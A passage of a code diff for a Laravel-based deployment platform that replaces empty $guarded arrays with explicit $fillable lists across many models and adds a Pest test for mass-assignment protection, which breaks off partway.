         'is_usable' => 'boolean',
diff --git a/app/Models/ScheduledDatabaseBackup.php b/app/Models/ScheduledDatabaseBackup.php
index 3ade21df8..c6aed863d 100644
--- a/app/Models/ScheduledDatabaseBackup.php
+++ b/app/Models/ScheduledDatabaseBackup.php
@@ -8,7 +8,25 @@
 
 class ScheduledDatabaseBackup extends BaseModel
 {
-    protected $guarded = [];
+    protected $fillable = [
+        'description',
+        'enabled',
+        'save_s3',
+        'frequency',
+        'database_backup_retention_amount_locally',
+        'database_type',
+        'database_id',
+        's3_storage_id',
+        'databases_to_backup',
+        'dump_all',
+        'database_backup_retention_days_locally',
+        'database_backup_retention_max_storage_locally',
+        'database_backup_retention_amount_s3',
+        'database_backup_retention_days_s3',
+        'database_backup_retention_max_storage_s3',
+        'timeout',
+        'disable_local_backup',
+    ];
 
     public static function ownedByCurrentTeam()
     {
diff --git a/app/Models/ScheduledDatabaseBackupExecution.php b/app/Models/ScheduledDatabaseBackupExecution.php
index c0298ecc8..f1f6e88b5 100644
--- a/app/Models/ScheduledDatabaseBackupExecution.php
+++ b/app/Models/ScheduledDatabaseBackupExecution.php
@@ -6,7 +6,17 @@
 
 class ScheduledDatabaseBackupExecution extends BaseModel
 {
-    protected $guarded = [];
+    protected $fillable = [
+        'status',
+        'message',
+        'size',
+        'filename',
+        'database_name',
+        'finished_at',
+        'local_storage_deleted',
+        's3_storage_deleted',
+        's3_uploaded',
+    ];
 
     protected function casts(): array
     {
diff --git a/app/Models/ScheduledTask.php b/app/Models/ScheduledTask.php
index e771ce31e..e76f1b7b9 100644
--- a/app/Models/ScheduledTask.php
+++ b/app/Models/ScheduledTask.php
@@ -29,7 +29,14 @@ class ScheduledTask extends BaseModel
     use HasFactory;
     use HasSafeStringAttribute;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'enabled',
+        'name',
+        'command',
+        'frequency',
+        'container',
+        'timeout',
+    ];
 
     public static function ownedByCurrentTeamAPI(int $teamId)
     {
diff --git a/app/Models/ScheduledTaskExecution.php b/app/Models/ScheduledTaskExecution.php
index c0601a4c9..dd74ba2e0 100644
--- a/app/Models/ScheduledTaskExecution.php
+++ b/app/Models/ScheduledTaskExecution.php
@@ -22,7 +22,15 @@
 )]
 class ScheduledTaskExecution extends BaseModel
 {
-    protected $guarded = [];
+    protected $fillable = [
+        'status',
+        'message',
+        'finished_at',
+        'started_at',
+        'retry_count',
+        'duration',
+        'error_details',
+    ];
 
     protected function casts(): array
     {
diff --git a/app/Models/Server.php b/app/Models/Server.php
index 00843b3da..f5ac0bd45 100644
--- a/app/Models/Server.php
+++ b/app/Models/Server.php
@@ -34,6 +34,7 @@
 use Spatie\SchemalessAttributes\Casts\SchemalessAttributes;
 use Spatie\SchemalessAttributes\SchemalessAttributesTrait;
 use Spatie\Url\Url;
+use Stevebauman\Purify\Facades\Purify;
 use Symfony\Component\Yaml\Yaml;
 use Visus\Cuid2\Cuid2;
 
@@ -265,14 +266,12 @@ public static function flushIdentityMap(): void
         'server_metadata',
     ];
 
-    protected $guarded = [];
-
     use HasSafeStringAttribute;
 
     public function setValidationLogsAttribute($value): void
     {
         $this->attributes['validation_logs'] = $value !== null
-            ? \Stevebauman\Purify\Facades\Purify::config('validation_logs')->clean($value)
+            ? Purify::config('validation_logs')->clean($value)
             : null;
     }
 
diff --git a/app/Models/ServerSetting.php b/app/Models/ServerSetting.php
index 504cfa60a..3afbc85ab 100644
--- a/app/Models/ServerSetting.php
+++ b/app/Models/ServerSetting.php
@@ -53,7 +53,50 @@
 )]
 class ServerSetting extends Model
 {
-    protected $guarded = [];
+    protected $fillable = [
+        'is_swarm_manager',
+        'is_jump_server',
+        'is_build_server',
+        'is_reachable',
+        'is_usable',
+        'wildcard_domain',
+        'is_cloudflare_tunnel',
+        'is_logdrain_newrelic_enabled',
+        'logdrain_newrelic_license_key',
+        'logdrain_newrelic_base_uri',
+        'is_logdrain_highlight_enabled',
+        'logdrain_highlight_project_id',
+        'is_logdrain_axiom_enabled',
+        'logdrain_axiom_dataset_name',
+        'logdrain_axiom_api_key',
+        'is_swarm_worker',
+        'is_logdrain_custom_enabled',
+        'logdrain_custom_config',
+        'logdrain_custom_config_parser',
+        'concurrent_builds',
+        'dynamic_timeout',
+        'force_disabled',
+        'is_metrics_enabled',
+        'generate_exact_labels',
+        'force_docker_cleanup',
+        'docker_cleanup_frequency',
+        'docker_cleanup_threshold',
+        'server_timezone',
+        'delete_unused_volumes',
+        'delete_unused_networks',
+        'is_sentinel_enabled',
+        'sentinel_token',
+        'sentinel_metrics_refresh_rate_seconds',
+        'sentinel_metrics_history_days',
+        'sentinel_push_interval_seconds',
+        'sentinel_custom_url',
+        'server_disk_usage_notification_threshold',
+        'is_sentinel_debug_enabled',
+        'server_disk_usage_check_frequency',
+        'is_terminal_enabled',
+        'deployment_queue_limit',
+        'disable_application_image_retention',
+    ];
 
     protected $casts = [
         'force_docker_cleanup' => 'boolean',
diff --git a/app/Models/Service.php b/app/Models/Service.php
index 84c047bb7..527328621 100644
--- a/app/Models/Service.php
+++ b/app/Models/Service.php
@@ -15,6 +15,7 @@
 use OpenApi\Attributes as OA;
 use Spatie\Activitylog\Models\Activity;
 use Spatie\Url\Url;
+use Symfony\Component\Yaml\Yaml;
 use Visus\Cuid2\Cuid2;
 
 #[OA\Schema(
@@ -47,7 +48,21 @@ class Service extends BaseModel
 
     private static $parserVersion = '5';
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'docker_compose_raw',
+        'docker_compose',
+        'connect_to_docker_network',
+        'service_type',
+        'config_hash',
+        'compose_parsing_version',
+        'environment_id',
+        'server_id',
+        'destination_id',
+        'destination_type',
+        'is_container_label_escape_enabled',
+    ];
 
     protected $appends = ['server_status', 'status'];
 
@@ -1552,7 +1567,7 @@ public function saveComposeConfigs()
         // Generate SERVICE_NAME_* environment variables from docker-compose services
         if ($this->docker_compose) {
             try {
-                $dockerCompose = \Symfony\Component\Yaml\Yaml::parse($this->docker_compose);
+                $dockerCompose = Yaml::parse($this->docker_compose);
                 $services = data_get($dockerCompose, 'services', []);
                 foreach ($services as $serviceName => $_) {
                     $envs->push('SERVICE_NAME_'.str($serviceName)->replace('-', '_')->replace('.', '_')->upper().'='.$serviceName);
diff --git a/app/Models/ServiceApplication.php b/app/Models/ServiceApplication.php
index 4bf78085e..e608c202d 100644
--- a/app/Models/ServiceApplication.php
+++ b/app/Models/ServiceApplication.php
@@ -5,12 +5,30 @@
 use Illuminate\Database\Eloquent\Casts\Attribute;
 use Illuminate\Database\Eloquent\Factories\HasFactory;
 use Illuminate\Database\Eloquent\SoftDeletes;
+use Symfony\Component\Yaml\Yaml;
 
 class ServiceApplication extends BaseModel
 {
     use HasFactory, SoftDeletes;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'human_name',
+        'description',
+        'fqdn',
+        'ports',
+        'exposes',
+        'status',
+        'exclude_from_status',
+        'required_fqdn',
+        'image',
+        'is_log_drain_enabled',
+        'is_include_timestamps',
+        'is_gzip_enabled',
+        'is_stripprefix_enabled',
+        'last_online_at',
+        'is_migrated',
+    ];
 
     protected static function booted()
     {
@@ -211,7 +229,7 @@ public function getRequiredPort(): ?int
                 return $this->service->getRequiredPort();
             }
 
-            $dockerCompose = \Symfony\Component\Yaml\Yaml::parse($dockerComposeRaw);
+            $dockerCompose = Yaml::parse($dockerComposeRaw);
             $serviceConfig = data_get($dockerCompose, "services.{$this->name}");
             if (! $serviceConfig) {
                 return $this->service->getRequiredPort();
diff --git a/app/Models/ServiceDatabase.php b/app/Models/ServiceDatabase.php
index c6a0143a8..e5b28d929 100644
--- a/app/Models/ServiceDatabase.php
+++ b/app/Models/ServiceDatabase.php
@@ -9,7 +9,27 @@ class ServiceDatabase extends BaseModel
 {
     use HasFactory, SoftDeletes;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'human_name',
+        'description',
+        'fqdn',
+        'ports',
+        'exposes',
+        'status',
+        'exclude_from_status',
+        'image',
+        'public_port',
+        'is_public',
+        'is_log_drain_enabled',
+        'is_include_timestamps',
+        'is_gzip_enabled',
+        'is_stripprefix_enabled',
+        'last_online_at',
+        'is_migrated',
+        'custom_type',
+        'public_port_timeout',
+    ];
 
     protected $casts = [
         'public_port_timeout' => 'integer',
diff --git a/app/Models/SharedEnvironmentVariable.php b/app/Models/SharedEnvironmentVariable.php
index 9bd42c328..158140b12 100644
--- a/app/Models/SharedEnvironmentVariable.php
+++ b/app/Models/SharedEnvironmentVariable.php
@@ -22,6 +22,9 @@ class SharedEnvironmentVariable extends Model
         'is_multiline',
         'is_literal',
         'is_shown_once',
+
+        // Metadata
+        'version',
     ];
 
     protected $casts = [
diff --git a/app/Models/SlackNotificationSettings.php b/app/Models/SlackNotificationSettings.php
index 128b25221..d4f125fb5 100644
--- a/app/Models/SlackNotificationSettings.php
+++ b/app/Models/SlackNotificationSettings.php
@@ -24,7 +24,8 @@ class SlackNotificationSettings extends Model
         'backup_failure_slack_notifications',
         'scheduled_task_success_slack_notifications',
         'scheduled_task_failure_slack_notifications',
-        'docker_cleanup_slack_notifications',
+        'docker_cleanup_success_slack_notifications',
+        'docker_cleanup_failure_slack_notifications',
         'server_disk_usage_slack_notifications',
         'server_reachable_slack_notifications',
         'server_unreachable_slack_notifications',
diff --git a/app/Models/StandaloneClickhouse.php b/app/Models/StandaloneClickhouse.php
index 143aadb6a..05f5853e3 100644
--- a/app/Models/StandaloneClickhouse.php
+++ b/app/Models/StandaloneClickhouse.php
@@ -13,7 +13,34 @@ class StandaloneClickhouse extends BaseModel
 {
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'clickhouse_admin_user',
+        'clickhouse_admin_password',
+        'is_log_drain_enabled',
+        'is_include_timestamps',
+        'status',
+        'image',
+        'is_public',
+        'public_port',
+        'ports_mappings',
+        'limits_memory',
+        'limits_memory_swap',
+        'limits_memory_swappiness',
+        'limits_memory_reservation',
+        'limits_cpus',
+        'limits_cpuset',
+        'limits_cpu_shares',
+        'started_at',
+        'restart_count',
+        'last_restart_at',
+        'last_restart_type',
+        'last_online_at',
+        'public_port_timeout',
+        'custom_docker_run_options',
+        'clickhouse_db',
+    ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
diff --git a/app/Models/StandaloneDocker.php b/app/Models/StandaloneDocker.php
index abd6e168f..09dae022b 100644
--- a/app/Models/StandaloneDocker.php
+++ b/app/Models/StandaloneDocker.php
@@ -12,7 +12,10 @@ class StandaloneDocker extends BaseModel
     use HasFactory;
     use HasSafeStringAttribute;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'network',
+    ];
 
     protected static function boot()
     {
diff --git a/app/Models/StandaloneDragonfly.php b/app/Models/StandaloneDragonfly.php
index c823c305b..af309f980 100644
--- a/app/Models/StandaloneDragonfly.php
+++ b/app/Models/StandaloneDragonfly.php
@@ -13,7 +13,33 @@ class StandaloneDragonfly extends BaseModel
 {
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'dragonfly_password',
+        'is_log_drain_enabled',
+        'is_include_timestamps',
+        'status',
+        'image',
+        'is_public',
+        'public_port',
+        'ports_mappings',
+        'limits_memory',
+        'limits_memory_swap',
+        'limits_memory_swappiness',
+        'limits_memory_reservation',
+        'limits_cpus',
+        'limits_cpuset',
+        'limits_cpu_shares',
+        'started_at',
+        'restart_count',
+        'last_restart_at',
+        'last_restart_type',
+        'last_online_at',
+        'public_port_timeout',
+        'enable_ssl',
+        'custom_docker_run_options',
+    ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
diff --git a/app/Models/StandaloneKeydb.php b/app/Models/StandaloneKeydb.php
index f286e8538..ee07b4783 100644
--- a/app/Models/StandaloneKeydb.php
+++ b/app/Models/StandaloneKeydb.php
@@ -13,7 +13,34 @@ class StandaloneKeydb extends BaseModel
 {
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'keydb_password',
+        'keydb_conf',
+        'is_log_drain_enabled',
+        'is_include_timestamps',
+        'status',
+        'image',
+        'is_public',
+        'public_port',
+        'ports_mappings',
+        'limits_memory',
+        'limits_memory_swap',
+        'limits_memory_swappiness',
+        'limits_memory_reservation',
+        'limits_cpus',
+        'limits_cpuset',
+        'limits_cpu_shares',
+        'started_at',
+        'restart_count',
+        'last_restart_at',
+        'last_restart_type',
+        'last_online_at',
+        'public_port_timeout',
+        'enable_ssl',
+        'custom_docker_run_options',
+    ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'server_status'];
 
diff --git a/app/Models/StandaloneMariadb.php b/app/Models/StandaloneMariadb.php
index efa62353c..ad5220496 100644
--- a/app/Models/StandaloneMariadb.php
+++ b/app/Models/StandaloneMariadb.php
@@ -14,7 +14,36 @@ class StandaloneMariadb extends BaseModel
 {
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'mariadb_root_password',
+        'mariadb_user',
+        'mariadb_password',
+        'mariadb_database',
+        'mariadb_conf',
+        'status',
+        'image',
+        'is_public',
+        'public_port',
+        'ports_mappings',
+        'limits_memory',
+        'limits_memory_swap',
+        'limits_memory_swappiness',
+        'limits_memory_reservation',
+        'limits_cpus',
+        'limits_cpuset',
+        'limits_cpu_shares',
+        'started_at',
+        'restart_count',
+        'last_restart_at',
+        'last_restart_type',
+        'last_online_at',
+        'public_port_timeout',
+        'enable_ssl',
+        'is_log_drain_enabled',
+        'custom_docker_run_options',
+    ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
diff --git a/app/Models/StandaloneMongodb.php b/app/Models/StandaloneMongodb.php
index 9418ebc21..590c173e1 100644
--- a/app/Models/StandaloneMongodb.php
+++ b/app/Models/StandaloneMongodb.php
@@ -13,7 +13,37 @@ class StandaloneMongodb extends BaseModel
 {
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'mongo_conf',
+        'mongo_initdb_root_username',
+        'mongo_initdb_root_password',
+        'mongo_initdb_database',
+        'status',
+        'image',
+        'is_public',
+        'public_port',
+        'ports_mappings',
+        'limits_memory',
+        'limits_memory_swap',
+        'limits_memory_swappiness',
+        'limits_memory_reservation',
+        'limits_cpus',
+        'limits_cpuset',
+        'limits_cpu_shares',
+        'started_at',
+        'restart_count',
+        'last_restart_at',
+        'last_restart_type',
+        'last_online_at',
+        'public_port_timeout',
+        'enable_ssl',
+        'ssl_mode',
+        'is_log_drain_enabled',
+        'is_include_timestamps',
+        'custom_docker_run_options',
+    ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
diff --git a/app/Models/StandaloneMysql.php b/app/Models/StandaloneMysql.php
index 2b7e9f2b6..d991617b7 100644
--- a/app/Models/StandaloneMysql.php
+++ b/app/Models/StandaloneMysql.php
@@ -13,7 +13,38 @@ class StandaloneMysql extends BaseModel
 {
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'mysql_root_password',
+        'mysql_user',
+        'mysql_password',
+        'mysql_database',
+        'mysql_conf',
+        'status',
+        'image',
+        'is_public',
+        'public_port',
+        'ports_mappings',
+        'limits_memory',
+        'limits_memory_swap',
+        'limits_memory_swappiness',
+        'limits_memory_reservation',
+        'limits_cpus',
+        'limits_cpuset',
+        'limits_cpu_shares',
+        'started_at',
+        'restart_count',
+        'last_restart_at',
+        'last_restart_type',
+        'last_online_at',
+        'public_port_timeout',
+        'enable_ssl',
+        'ssl_mode',
+        'is_log_drain_enabled',
+        'is_include_timestamps',
+        'custom_docker_run_options',
+    ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
diff --git a/app/Models/StandalonePostgresql.php b/app/Models/StandalonePostgresql.php
index cea600236..71034427f 100644
--- a/app/Models/StandalonePostgresql.php
+++ b/app/Models/StandalonePostgresql.php
@@ -13,7 +13,40 @@ class StandalonePostgresql extends BaseModel
 {
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'postgres_user',
+        'postgres_password',
+        'postgres_db',
+        'postgres_initdb_args',
+        'postgres_host_auth_method',
+        'postgres_conf',
+        'init_scripts',
+        'status',
+        'image',
+        'is_public',
+        'public_port',
+        'ports_mappings',
+        'limits_memory',
+        'limits_memory_swap',
+        'limits_memory_swappiness',
+        'limits_memory_reservation',
+        'limits_cpus',
+        'limits_cpuset',
+        'limits_cpu_shares',
+        'started_at',
+        'restart_count',
+        'last_restart_at',
+        'last_restart_type',
+        'last_online_at',
+        'public_port_timeout',
+        'enable_ssl',
+        'ssl_mode',
+        'is_log_drain_enabled',
+        'is_include_timestamps',
+        'custom_docker_run_options',
+    ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
diff --git a/app/Models/StandaloneRedis.php b/app/Models/StandaloneRedis.php
index 0e904ab31..4eb28e038 100644
--- a/app/Models/StandaloneRedis.php
+++ b/app/Models/StandaloneRedis.php
@@ -13,7 +13,33 @@ class StandaloneRedis extends BaseModel
 {
     use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'redis_conf',
+        'status',
+        'image',
+        'is_public',
+        'public_port',
+        'ports_mappings',
+        'limits_memory',
+        'limits_memory_swap',
+        'limits_memory_swappiness',
+        'limits_memory_reservation',
+        'limits_cpus',
+        'limits_cpuset',
+        'limits_cpu_shares',
+        'started_at',
+        'restart_count',
+        'last_restart_at',
+        'last_restart_type',
+        'last_online_at',
+        'public_port_timeout',
+        'enable_ssl',
+        'is_log_drain_enabled',
+        'is_include_timestamps',
+        'custom_docker_run_options',
+    ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
diff --git a/app/Models/Subscription.php b/app/Models/Subscription.php
index 69d7cbf0d..fa135b29f 100644
--- a/app/Models/Subscription.php
+++ b/app/Models/Subscription.php
@@ -6,7 +6,18 @@
 
 class Subscription extends Model
 {
-    protected $guarded = [];
+    protected $fillable = [
+        'stripe_invoice_paid',
+        'stripe_subscription_id',
+        'stripe_customer_id',
+        'stripe_cancel_at_period_end',
+        'stripe_plan_id',
+        'stripe_feedback',
+        'stripe_comment',
+        'stripe_trial_already_ended',
+        'stripe_past_due',
+        'stripe_refunded_at',
+    ];
 
     protected function casts(): array
     {
diff --git a/app/Models/SwarmDocker.php b/app/Models/SwarmDocker.php
index 3144432c5..656749119 100644
--- a/app/Models/SwarmDocker.php
+++ b/app/Models/SwarmDocker.php
@@ -6,7 +6,10 @@
 
 class SwarmDocker extends BaseModel
 {
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'network',
+    ];
 
     public function setNetworkAttribute(string $value): void
     {
diff --git a/app/Models/Tag.php b/app/Models/Tag.php
index 3594d1072..9ee58cf7d 100644
--- a/app/Models/Tag.php
+++ b/app/Models/Tag.php
@@ -8,7 +8,9 @@ class Tag extends BaseModel
 {
     use HasSafeStringAttribute;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+    ];
 
     protected function customizeName($value)
     {
diff --git a/app/Models/Team.php b/app/Models/Team.php
index 5a7b377b6..300280b99 100644
--- a/app/Models/Team.php
+++ b/app/Models/Team.php
@@ -40,7 +40,12 @@ class Team extends Model implements SendsDiscord, SendsEmail, SendsPushover, Sen
 {
     use HasFactory, HasNotificationSettings, HasSafeStringAttribute, Notifiable;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'description',
+        'show_boarding',
+        'custom_server_limit',
+    ];
 
     protected $casts = [
         'personal_team' => 'boolean',
diff --git a/app/Models/TelegramNotificationSettings.php b/app/Models/TelegramNotificationSettings.php
index 73889910e..4930f45d4 100644
--- a/app/Models/TelegramNotificationSettings.php
+++ b/app/Models/TelegramNotificationSettings.php
@@ -25,7 +25,8 @@ class TelegramNotificationSettings extends Model
         'backup_failure_telegram_notifications',
         'scheduled_task_success_telegram_notifications',
         'scheduled_task_failure_telegram_notifications',
-        'docker_cleanup_telegram_notifications',
+        'docker_cleanup_success_telegram_notifications',
+        'docker_cleanup_failure_telegram_notifications',
         'server_disk_usage_telegram_notifications',
         'server_reachable_telegram_notifications',
         'server_unreachable_telegram_notifications',
@@ -39,7 +40,8 @@ class TelegramNotificationSettings extends Model
         'telegram_notifications_backup_failure_thread_id',
         'telegram_notifications_scheduled_task_success_thread_id',
         'telegram_notifications_scheduled_task_failure_thread_id',
-        'telegram_notifications_docker_cleanup_thread_id',
+        'telegram_notifications_docker_cleanup_success_thread_id',
+        'telegram_notifications_docker_cleanup_failure_thread_id',
         'telegram_notifications_server_disk_usage_thread_id',
         'telegram_notifications_server_reachable_thread_id',
         'telegram_notifications_server_unreachable_thread_id',
diff --git a/app/Models/User.php b/app/Models/User.php
index 7c68657e7..8ef5426a8 100644
--- a/app/Models/User.php
+++ b/app/Models/User.php
@@ -4,7 +4,9 @@
 
 use App\Jobs\UpdateStripeCustomerEmailJob;
 use App\Notifications\Channels\SendsEmail;
+use App\Notifications\TransactionalEmails\EmailChangeVerification;
 use App\Notifications\TransactionalEmails\ResetPassword as TransactionalEmailsResetPassword;
+use App\Services\ChangelogService;
 use App\Traits\DeletesUserSessions;
 use DateTimeInterface;
 use Illuminate\Database\Eloquent\Factories\HasFactory;
@@ -41,7 +43,16 @@ class User extends Authenticatable implements SendsEmail
 {
     use DeletesUserSessions, HasApiTokens, HasFactory, Notifiable, TwoFactorAuthenticatable;
 
-    protected $guarded = [];
+    protected $fillable = [
+        'name',
+        'email',
+        'password',
+        'force_password_reset',
+        'marketing_emails',
+        'pending_email',
+        'email_change_code',
+        'email_change_code_expires_at',
+    ];
 
     protected $hidden = [
         'password',
@@ -228,7 +239,7 @@ public function changelogReads()
 
     public function getUnreadChangelogCount(): int
     {
-        return app(\App\Services\ChangelogService::class)->getUnreadCountForUser($this);
+        return app(ChangelogService::class)->getUnreadCountForUser($this);
     }
 
     public function getRecipients(): array
@@ -239,7 +250,7 @@ public function getRecipients(): array
     public function sendVerificationEmail()
     {
         $mail = new MailMessage;
-        $url = Url::temporarySignedRoute(
+        $url = URL::temporarySignedRoute(
             'verify.verify',
             Carbon::now()->addMinutes(Config::get('auth.verification.expire', 60)),
             [
@@ -408,7 +419,7 @@ public function requestEmailChange(string $newEmail): void
         ]);
 
         // Send verification email to new address
-        $this->notify(new \App\Notifications\TransactionalEmails\EmailChangeVerification($this, $code, $newEmail, $expiresAt));
+        $this->notify(new EmailChangeVerification($this, $code, $newEmail, $expiresAt));
     }
 
     public function isEmailChangeCodeValid(string $code): bool
diff --git a/bootstrap/helpers/applications.php b/bootstrap/helpers/applications.php
index c522cd0ca..fbcedf277 100644
--- a/bootstrap/helpers/applications.php
+++ b/bootstrap/helpers/applications.php
@@ -6,6 +6,7 @@
 use App\Jobs\VolumeCloneJob;
 use App\Models\Application;
 use App\Models\ApplicationDeploymentQueue;
+use App\Models\EnvironmentVariable;
 use App\Models\Server;
 use App\Models\StandaloneDocker;
 use Spatie\Url\Url;
@@ -192,7 +193,7 @@ function clone_application(Application $source, $destination, array $overrides =
     $server = $destination->server;
 
     if ($server->team_id !== currentTeam()->id) {
-        throw new \RuntimeException('Destination does not belong to the current team.');
+        throw new RuntimeException('Destination does not belong to the current team.');
     }
 
     // Prepare name and URL
@@ -211,7 +212,7 @@ function clone_application(Application $source, $destination, array $overrides =
         'updated_at',
         'additional_servers_count',
         'additional_networks_count',
-    ])->fill(array_merge([
+    ])->forceFill(array_merge([
         'uuid' => $uuid,
         'name' => $name,
         'fqdn' => $url,
@@ -322,8 +323,8 @@ function clone_application(Application $source, $destination, array $overrides =
                     destination: $source->destination,
                     no_questions_asked: true
                 );
-            } catch (\Exception $e) {
-                \Log::error('Failed to copy volume data for '.$volume->name.': '.$e->getMessage());
+            } catch (Exception $e) {
+                Log::error('Failed to copy volume data for '.$volume->name.': '.$e->getMessage());
             }
         }
     }
@@ -344,7 +345,7 @@ function clone_application(Application $source, $destination, array $overrides =
     // Clone production environment variables without triggering the created hook
     $environmentVariables = $source->environment_variables()->get();
     foreach ($environmentVariables as $environmentVariable) {
-        \App\Models\EnvironmentVariable::withoutEvents(function () use ($environmentVariable, $newApplication) {
+        EnvironmentVariable::withoutEvents(function () use ($environmentVariable, $newApplication) {
             $newEnvironmentVariable = $environmentVariable->replicate([
                 'id',
                 'created_at',
@@ -361,7 +362,7 @@ function clone_application(Application $source, $destination, array $overrides =
     // Clone preview environment variables
     $previewEnvironmentVariables = $source->environment_variables_preview()->get();
     foreach ($previewEnvironmentVariables as $previewEnvironmentVariable) {
-        \App\Models\EnvironmentVariable::withoutEvents(function () use ($previewEnvironmentVariable, $newApplication) {
+        EnvironmentVariable::withoutEvents(function () use ($previewEnvironmentVariable, $newApplication) {
             $newPreviewEnvironmentVariable = $previewEnvironmentVariable->replicate([
                 'id',
                 'created_at',
diff --git a/tests/Feature/MassAssignmentProtectionTest.php b/tests/Feature/MassAssignmentProtectionTest.php
new file mode 100644
index 000000000..7a5f97a4e
--- /dev/null
+++ b/tests/Feature/MassAssignmentProtectionTest.php
@@ -0,0 +1,249 @@
+<?php
+
+use App\Models\Application;
+use App\Models\Server;
+use App\Models\Service;
+use App\Models\StandaloneClickhouse;
+use App\Models\StandaloneDragonfly;
+use App\Models\StandaloneKeydb;
+use App\Models\StandaloneMariadb;
+use App\Models\StandaloneMongodb;
+use App\Models\StandaloneMysql;
+use App\Models\StandalonePostgresql;
+use App\Models\StandaloneRedis;
+use App\Models\Team;
+use App\Models\User;
+
+describe('mass assignment protection', function () {
+
+    test('no API-exposed model uses unguarded $guarded = []', function () {
+        $models = [
+            Application::class,
+            Service::class,
+            User::class,
+            Team::class,
+            Server::class,
+            StandalonePostgresql::class,
+            StandaloneRedis::class,
+            StandaloneMysql::class,
+            StandaloneMariadb::class,
+            StandaloneMongodb::class,
+            StandaloneKeydb::class,
+            StandaloneDragonfly::class,
+            StandaloneClickhouse::class,
+        ];
+
+        foreach ($models as $modelClass) {
+            $model = new $modelClass;
+            $guarded = $model->getGuarded();
+            $fillable = $model->getFillable();
+
+            // Model must NOT have $guarded = [] (empty guard = no protection)
+            // It should either have non-empty $guarded OR non-empty $fillable
+            $hasProtection = $guarded !== ['*'] ? count($guarded) > 0 : true;
+            $hasProtection = $hasProtection || count($fillable) > 0;
+
+            expect($hasProtection)
+                ->toBeTrue("Model {$modelClass} has no mass assignment protection (empty \$guarded and empty \$fillable)");
+        }
+    });
+
+    test('Application model blocks mass assignment of identity fields', function () {
+        $application = new Application;
+
+        expect($application->isFillable('id'))->toBeFalse('id should not be fillable');
+        expect($application->isFillable('uuid'))->toBeFalse('uuid should not be fillable');
+        expect($application->isFillable('created_at'))->toBeFalse('created_at should not be fillable');
+        expect($application->isFillable('updated_at'))->toBeFalse('updated_at should not be fillable');
+        expect($application->isFillable('deleted_at'))->toBeFalse('deleted_at should not be fillable');
+    });
+
+    test('Application model allows mass assignment of user-facing fields', function () {
+        $application = new Application;
+        $userFields = ['name', 'description', 'git_repository', 'git_branch', 'build_pack', 'install_command', 'build_command', 'start_command', 'ports_exposes', 'health_check_path', 'health_check_enabled', 'limits_memory', 'status'];
+
+        foreach ($userFields as $field) {
+            expect($application->isFillable($field))
+                ->toBeTrue("Application model should allow mass assignment of '{$field}'");
+        }
+    });
+
+    test('Application model allows mass assignment of relationship fields needed for create()', function () {
+        $application = new Application;
+        $relationFields = ['environment_id', 'destination_id', 'destination_type', 'source_id', 'source_type', 'private_key_id', 'repository_project_id'];
+
+        foreach ($relationFields as $field) {
+            expect($application->isFillable($field))
+                ->toBeTrue("Application model should allow mass assignment of '{$field}' for internal create() calls");
+        }
+    });
+
+    test('Application fill ignores non-fillable fields', function () {
+        $application = new Application;
+        $application->fill([
+            'name' => 'test-app',
+            'team_id' => 999,
+        ]);
+
+        expect($application->name)->toBe('test-app');
+        expect($application->team_id)->toBeNull();
+    });
+
+    test('Server model has $fillable and no conflicting $guarded', function () {
+        $server = new Server;
+        $fillable = $server->getFillable();
+        $guarded = $server->getGuarded();
+
+        expect($fillable)->not->toBeEmpty('Server model should have explicit $fillable');
+        expect($guarded)->not->toBe([], 'Server model should not have $guarded = [] overriding $fillable');
+    });
+
+    test('Server model blocks mass assignment of dangerous fields', function () {
+        $server = new Server;
+
+        expect($server->isFillable('id'))->toBeFalse();
+        expect($server->isFillable('uuid'))->toBeFalse();
+        expect($server->isFillable('created_at'))->toBeFalse();
+    });
+
+    test('User model blocks mass assignment of auth-sensitive fields', function () {
+        $user = new User;
+
+        expect($user->isFillable('id'))->toBeFalse('User id should not be fillable');
+        expect($user->isFillable('email_verified_at'))->toBeFalse('email_verified_at should not be fillable');
+        expect($user->isFillable('remember_token'))->toBeFalse('remember_token should not be fillable');
+        expect($user->isFillable('two_factor_secret'))->toBeFalse('two_factor_secret should not be fillable');
